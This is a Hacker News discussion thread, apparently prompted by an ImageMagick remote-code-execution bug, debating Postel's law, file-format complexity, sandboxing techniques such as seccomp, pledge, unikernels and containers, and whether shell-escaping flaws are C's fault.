    TCP implementations will follow a general principle of robustness:  be
    conservative in what you do, be liberal in what you accept from
    others.


The problem is that being conservative and precise isn't enough. You and I can both be conservative, but disagree on the specifics (given an ambiguous spec, for instance). A permissive receiver of both our data now has to support both sides of our disagreement forever.


No they don't. They just have to not explode.


They do if they have any competition. Browsers are the perfect example here: a browser which responds to broken HTML by not working, but not exploding either, is going to lose out to one which does work. That means market forces pin the disagreement in place.


IE did well for many years. That's why people used quirks mode and work arounds.

What's the current market share for IE? 30% 40%? That seems pretty good for a browser which for years was a broken malware propagating mess.


Put more succinctly: Gresham's Law trumps Postel's Principle.


> but be cautious in what you send is just as important.

How are you going to enforce this for everyone?

> TCP implementations will follow a general principle of robustness (...)

This rule has worked well for TCP implementors in large part because of their circumstances, which are very different from those of browser implementors and Web developers:

(0) Priorities: How much do the following desiderata matter to each group: reliability, performance, new features?

(1) Skill: What skills does a representative programmer from each group have?

(2) Risk profile: How does each group cope with the possibility of design and implementation errors? How much technical debt are they willing to take?

I'd contend that Postel's law doesn't scale beyond relatively small groups of highly skilled programmers, for whom reliability is paramount and trumps all other considerations.


Exactly. So by being permissive from the start we now have this dumpster fire that prevents us from writing sane and performant code. Because we have to assume that with crap input the user doesn't want

Imagine what C++ would look like if all compilers had to accept all different variations of it, and the result of compiling 100 almost valid C++ files should, as far as possible, be a program that runs in some sense.

Most of the web pages I have ever written have probably been ill-formed because browsers don't tell me what's wrong, and instead show me a (nearly) working web page.


> Imagine what C++ would look like if all compilers had to accept all different variations of it, and the result of compiling 100 almost valid C++ files should, as far as possible, be a program that runs in some sense.

C++ is still a lot more permissive than it could and should be.

> Most of the web pages I have ever written have probably been ill-formed because browsers don't tell me what's wrong, and instead show me a (nearly) working web page.

Same here. The idea that JavaScript ought to be permissive and forgiving because its target audience doesn't know what they're doing turned out to be a self-fulfilling prophecy on the part of its designers.


It would be a lot more sensible than you think. When I get a compilation error, what I do is take a breath, think about the meaning of my code, correct any logical mistakes I can find, and try to compile again. Why couldn't Web developers do the same?

Also, there's no need to crash the tab. The browser could simply stop running any JavaScript, and leave the user with a static page.


IIRC some of the older versions of internet explorer did something like that, showing the user a popup if an error happened and asked them if they wanted to keep going.


Next, browsers will show users a popup asking if they want to jump off a cliff.


The solution I've been experimenting with is to run this sort of code in an isolated, network-stack-free unikernel environment.

Imagine that you've built the ImageMagick library into a unikernel server using a virtio serial port for I/O. When you need to process an image, you boot a VM with this imagemagick kernel, then pipe the image data through its virtual serial port. Data goes in, data comes out...

And if the attacker manages remote code execution inside the VM, who cares? There's nothing in there. There's no network stack, there's no access to storage, there's no access to other processes; all you give this VM is the RAM and serial port the unikernel needs to do its job.


Or... you could just run it as nobody and maybe unshare its network and chroot it and not add the surface area of some virtio driver to your stack?

Like, there's no magic to a unikernel. It's just a process in a jail, unless you're legitimately running it directly on the cpu. Adding more layers of abstraction does not inherently add security.


It's the removal of abstraction layers which appeals to me. Why secure the kernel syscall interface when you can remove it? The hypervisor will be a potential attack surface anyway, so it's not a new point of vulnerability.

Sure, it's just a different kind of jail, but I'd rather start with a jail that is empty by default and add selected features to it when I'm convinced they're safe, than start with an ordinary apartment and remove things from it until I think it's secure enough to function as a jail cell.


I think the difference is that that seems like something I would screw up. I know how to make a $5 DigitalOcean instance that only has ImageMagick that I can pipe photos to and from. I don't trust myself to unshare the network from some running process without leaving other holes.

There are all these gotchas when you have stuff running in the same OS and it just takes one little mistake and your adversary has root.


I'm... very skeptical that it's trivial to make a $5 DO instance you can pipe imagemagick to from another host and has nothing else on it. Note that if you're talking about using a linux image, this is not even remotely a unikernel.

Also, there are still myriad ways this kind of interface can represent an attack surface if you aren't sufficiently careful with the communication protocol (that presumably you are writing).


tl;dr Unix security model is too hard to use. Let's put another layer of crap around it!


Don't be reductive – OP made a very good point, and you're not arguing it head-on.

> There are all these gotchas when you have stuff running in the same OS and it just takes one little mistake and your adversary has root.


How is "There are all these gotchas when you have stuff running in the same OS and it just takes one little mistake and your adversary has root" not saying that the Unix security model is too hard to use?


No, the Unix security model is insufficient.


"seccomp()" (old simple mode) does pretty much this but much more simply and efficiently - disallows all system calls except read() and write() to existing file descriptors, and exit() and sigreturn().

https://en.wikipedia.org/wiki/Seccomp


With containers I already get such security. For example, I can run ImageMagic binaries inside a container with no network, no capabilities and minimal syscall interface. The attack surface of such setup is not particularly larger than hypervisor interface but performance is much closer to that of native executable.


If you can generate arbitrary content downstream, you can use this as a stage to a larger multi-stage attack.

And that assumes your unikernel environment has no subtle tricks to escape the jail.


Sure, "solution" might have been the wrong word. It's not the whole answer, but it is a potentially interesting way to reduce the attack surface.


I think before #1, #2, or Rust, we need a better "libsandbox". You don't even need containers to do this -- DJB showed how to do this with Unix over a decade ago [1]. See section 5.2: isolating single source transformations.

I think the reason people don't do this is because it's extremely platform-specific. Most of this C code runs on Windows too (ImageMagick, ffmpeg, etc.)

And it's complicated. But if there were a nice library to do all this stuff, I think people would use it.

If you're just shelling out to command line tools like ImageMagick, you don't even have to change any C code... you can just run it under a wrapper (sorta like systemd-nspawn). But I think most people are not using ImageMagick that way -- they are using a Python/Ruby binding, etc.

But it can still be done -- it just takes a little effort. MUCH less effort than changing any of that old crufty code, much less rewriting it in Rust!

[1] Some thoughts on security after 10 years of qmail -- https://scholar.google.com/scholar?cluster=98145703154405707...


This kind of problem is inherent to the Unix model of processes communicating by passing byte streams around. The way to solve it properly would be to make the process command interface something more structured (e.g. thrift/protobuf), so that rather than shelling out to wget --whatever and hoping you've escaped it correctly you'd pass an actually structured command.


The process command interface is more structured! You don't have to go through /bin/sh and worry about escaping. You could call exec. Ok, so you'd still have to worry about sticking "--" before the URL, but that's easy. No more worries about quoting.

Of course, chaining multiple commands together is a pain, and that's what the shell is good at, but then it is hard to get the quoting right. So a more structured shell interface. There's libpipeline, but I haven't used it to comment on.


But images and videos are byte streams already... The security boundary is often the network, where things are serialized anyway. The whole point is to sandbox the deserialization only, which has a large attack surface due to complex conditionals and string handling.

The rest of the application will need to run with privileges to actually do the stuff you care about, like display things to your screen and so forth.


> But images and videos are byte streams already...

Right, but the reason for this bug (and many others) is the mingling of the data bytestream and the command channel (the arguments for the call to wget).

> The whole point is to sandbox the deserialization only, which has a large attack surface due to complex conditionals and string handling.

I don't think that would help. Your sandboxed deserializer deserializes the video file into an inert datastructure. But then you go to system() to wget based on that datastructure and you're pouring commands and data into a flat stream. That architecture won't stop you from parsing a bunch of unix commands as image bytes and then passing those "image bytes" on the command line.


DJB maybe is a prominent cryptographer, but his code and security practices, especially around Qmail, are simply atrocious. I wouldn't quote him for anything that touches real C code.


Can you elaborate on this? I have never thought of "atrocious" when someone mentioned the history of vulnerabilities in djb's software. Depending on how egregious these security practices are there could be a $500 check in it for you.


> I have never thought of "atrocious" when someone mentioned the history of vulnerabilities in djb's software.

You mean when DJB denied Qmail has bugs?

http://www.dt.e-technik.tu-dortmund.de/~ma/qmail-bugs.html

Unfortunately, 404 at the moment, but Internet Archive has a copy:

https://web.archive.org/web/20160409054053/http://www.dt.e-t...


Yes, "atrocious security" is not my reaction to a 15 year old MTA with two DoS and two RCEs.


Oh yes, because denying that your code has a vulnerability counts as a good security practice.

You know why this MTA has that low count of published bugs? Because nobody uses it anymore, so nobody looks at its code (and now factor in the ugliness of the code itself, which lowers the eagerness to look at the code even more). It's not because the code is (magically?) better.


Uncompromising and inconvenient to work with, maybe. Why atrocious?


Have you seen, for example, how he structured his code? One file per C function, with no header files. And guess what? He still does that to new code.


One file per C function is an old practice you can still see in many libc implementations and in other pieces of code designed to be used as a static library. Since a traditional Unix static library is nothing but an archive of .o files, and a traditional Unix linker makes its include-or-omit decisions on the granularity of an .o file, putting each function in a separate source file maximizes the linker's ability to strip unused functions out of a static library.


One file per C function enables an attacker to _____ qmail/djbdns/etc. ???


glibc does something similar. I'm not sure I see the problem. It's different, but I wouldn't call it bad.


Sandboxes aren't the solution. Correctly designed and implemented programs and file formats are.


That's not really useful. If only we could "solve" security by telling everyone to write correct code.


Not by just telling people to write correct code. By rejecting incorrect code.


> So, we get it. Complicated file and network formats, handled in C code leads to these types of security issues.

Actually, the magic byte thing makes me think this is a content sniffing issue, and the RCE might be due to a "feature". Rust won't help or, at best, would make it more awkward to exploit.

A capability-based (i.e. memory-safe, no accessible globals that can induce side effects) system would mitigate this, though. If I call out to ImageMagick and say "rescale this image", ImageMagick should not be able to initiate network requests in response.


> A capability-based (i.e. memory-safe, no accessible globals that can induce side effects) system would mitigate this, though.

Check out OpenBSD's pledge, it's addressing precisely this problem.

http://man.openbsd.org/OpenBSD-current/man2/pledge.2


> Check out OpenBSD's pledge, it's addressing precisely this problem.

Au contraire.

You can fork(), restrict yourself to a couple of pipes in a subprocess, pledge(), do the calculation in the subprocess, and exit the subprocess. It'll work, and it'll be slow. But this isn't at all specific to pledge() -- seccomp can do exactly the same thing, arguably more simply. Performance will suck either way.

<rant>I have yet to see a credible argument for how pledge() is better than seccomp. You could almost implement pledge() as a library function that uses seccomp, and the I consider the one part of pledge (execve behavior) that this won't get right to be a misfeature in pledge<./rant>

The performance of that scheme will be abysmal for anything that does very fine-grained sandboxing. What you want is language support. E (erights.org) does this as a matter of course. Rust and similar languages could if they were to allow subsetting of globally accessible objects. Java and .NET tried to do this and fell utterly flat.

I've considered trying to get a nice Linux feature to do this kind of sandboxing with kernel help (call a function that can only write to a certain memory aperture without the overhead of forking every time), and maybe I'll get this working some day.


There are several differences, eg pledge is not inherited by exec, while seccomp is. Also seccomp is vastly more complex and it is not really possible to filter by eg filename, so you need additional tools.


You could indeed implement pledge as a seccomp wrapper, pledge wins because its near trivial to add to programs.


Isn't intel's new memory protection keys feature intended to allow exactly this sort of thing?


Nope. Intel's MPX is an opt-in thing to assist with pointer bounds checking.


I was thinking of MPK, not MPX.

You'd set the library's code and data pages to protection key 1, along with the page containing a library access trampoline, leaving the rest of the address space with protection key 0. You'd call into the library through the trampoline, which would revoke access to protection key 0, call into the library, then restore access to key 0.


That's a whack-a-mole approach that doesn't even try to define a real security boundary. It will catch the most common errors, sure, but it's not a long-term solution.


> If I call out to ImageMagick and say "rescale this image", ImageMagick should not be able to initiate network requests in response.

Impossible in the world where programmers routinely cram together networking and file transformations without any regard for whether the operation belongs there or not (build systems that on `compile' command download random things from internets; even Rust's build system does such a dumb thing by downloading rustc after running an hour-long LLVM compilation, instead of failing before doing anything).


Hm, this should be in parallel. If downloading stage0 waits till after LLVM complies, that's a bug, IMHO.


So the way to prevent robots from throwing people of a cliff is to use a capability system that only allows robots to kill people when explicit authorized?


Is it C's fault here though?

Is it not just improper shell escaping? You could do that incorrectly in any language. If you're not quoting | and ` and stuff correctly when you call system() you're doomed no matter the language.


qmail has already been pointed to elsewhere in this discussion. One of the qmail security principles, which are fast approaching 20 years old, is the maxim: Don't parse. This is directly applicable here.

* http://cr.yp.to/qmail/guarantee.html

* http://cr.yp.to/qmail/qmailsec-20071101.pdf

The GNKSOA-MUA comes to mind, too. The other vulnerabilities (there being five -- see the mailing list message) are related to the idea of allowing input data files to contain embedded actions and commands to be executed by the data processing tool. In the world of mail there were many variations on this theme. Clifton T. Sharp Jr's Usenet signature was "Here, Outlook Express, run this program." "Okay, stranger.".

* http://homepage.ntlworld.com./jonathan.deboynepollard/Propos...


from googling and looking at the source this looks like it has nothing to do with c, its more of a logic error where a handler delegates control to another process, curl for example, based on image type. I could be wrong but thats what it looks like to me.


> 1. Simpler formats for file representation and data interchange. When someone tries to add an extra bitfield option, say no. When they keep trying, get a wooden stick with "no" written on it. Part of the disease of modern computing is bloated specs.

> 2. Restrictive not permissive code bases. Exit and bail out early. Tell the user "file corrupted". Push back.

The best talk on computer security I have seen is Meredith Patterson's Science of Insecurity at 28c3: https://www.youtube.com/watch?v=3kEfedtQVOY

It is really interesting that the techniques needed to achieve these security goals (theory of grammars) is one of the oldest and best explored areas of computer science.


Shell metacharacter and option injection vulnerabilities exist in almost every language, not just C:

http://bonedaddy.net/pabs3/log/2014/02/17/pid-preservation-s... http://www.defensecode.com/public/DefenseCode_Unix_WildCards...


I've been writing Rust too, but I'm not why the argument that it'll reduce the attack surface is glib. It can't prevent all security holes, though, because nothing can.


1. is not applicable even in mid-term, unless you want to break the internet

2. is breaking the internet

I'm not sure I'm ready to accept the collateral damage of your solutions.

How about looking at "C" (or any other language with direct memory access) as the culprit? (EDIT: Assuming it's a C-issue after all and not just some dumb input validation problem.)


Hopefully it will convince developers to not trust the client and actually confirm the user uploaded a .jpg, .png or .gif. But I guess that isn’t nearly as useful for us when we want a reason why we need to rewrite everything. :)


You know what a lot of people do to confirm the user actually uploaded a jpg, png, or gif?

Use ImageMagick. http://www.imagemagick.org/script/identify.php


That's a pretty ridiculous answer considering the volume of C code and rust being a new language.


If you don't like bitfields, you'd better stay away from H264/5.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: